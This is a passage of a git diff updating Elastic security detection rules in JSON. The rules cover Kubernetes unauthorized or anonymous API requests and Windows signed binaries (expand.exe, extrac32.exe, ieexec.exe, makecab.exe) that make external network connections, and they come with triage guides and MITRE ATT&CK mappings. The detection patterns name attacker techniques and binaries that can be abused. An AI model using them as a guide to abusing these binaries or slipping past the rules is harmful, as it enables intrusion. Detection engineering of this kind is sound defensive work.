service account should never send an unauthorized request to the API server. This behavior is likely an indicator of compromise or of a problem within the cluster. An adversary may have gained access to credentials/tokens and this could be an attempt to access or create resources to facilitate further movement or execution within the cluster.", + "false_positives": [ + "Unauthorized requests from service accounts are highly abnormal and more indicative of human behavior or a serious problem within the cluster. This behavior should be investigated further." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Denied Service Account Request", + "note": "", + "query": "event.dataset: \"kubernetes.audit_logs\"\n and kubernetes.audit.user.username: system\\:serviceaccount\\:*\n and kubernetes.audit.annotations.authorization_k8s_io/decision: \"forbid\"\n", + "references": [ + "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections", + "https://kubernetes.io/docs/reference/access-authn-authz/authentication/#service-account-tokens" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.user.username", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "63c056a0-339a-11ed-a261-0242ac120002", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1613", + "name": "Container and Resource Discovery", + "reference": "https://attack.mitre.org/techniques/T1613/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "63c056a0-339a-11ed-a261-0242ac120002_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_3.json b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_3.json index ade00ba4959..acb670b79b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_3.json +++ b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_3.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_4.json b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_4.json index 2e0c868b6bb..a26b32553ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_4.json +++ b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_4.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_5.json b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_5.json index a1bc7e025f2..bef9aed5968 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_5.json +++ b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_5.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_6.json b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_6.json new file mode 100644 index 00000000000..7e1648ae03a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_6.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects when an unauthenticated user request is authorized within the cluster. Attackers may attempt to use anonymous accounts to gain initial access to the cluster or to avoid attribution of their activities within the cluster. This rule excludes the /healthz, /livez and /readyz endpoints which are commonly accessed anonymously.", + "false_positives": [ + "Anonymous access to the API server is a dangerous setting enabled by default. Common anonymous connections (e.g., health checks) have been excluded from this rule. All other instances of authorized anonymous requests should be investigated." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Anonymous Request Authorized", + "note": "", + "query": "event.dataset:kubernetes.audit_logs\n and kubernetes.audit.annotations.authorization_k8s_io/decision:allow\n and kubernetes.audit.user.username:(\"system:anonymous\" or \"system:unauthenticated\" or not *)\n and not kubernetes.audit.requestURI:(/healthz* or /livez* or /readyz*)\n", + "references": [ + "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestURI", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.user.username", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "63c057cc-339a-11ed-a261-0242ac120002", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Initial Access", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.001", + "name": "Default Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 + }, + "id": "63c057cc-339a-11ed-a261-0242ac120002_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_102.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_102.json index 609cf74461e..6899c661ec5 100644 --- a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_102.json +++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_103.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_103.json index 6b57362088d..008ffdd8557 100644 --- a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_103.json +++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_103.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Signed Binary", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_104.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_104.json index ecf9ae5d42f..1ffaa7c7183 100644 --- a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_104.json +++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Signed Binary", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_105.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_105.json index 1c50f64b5bf..363eec88bbe 100644 --- a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_105.json +++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Signed Binary", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values 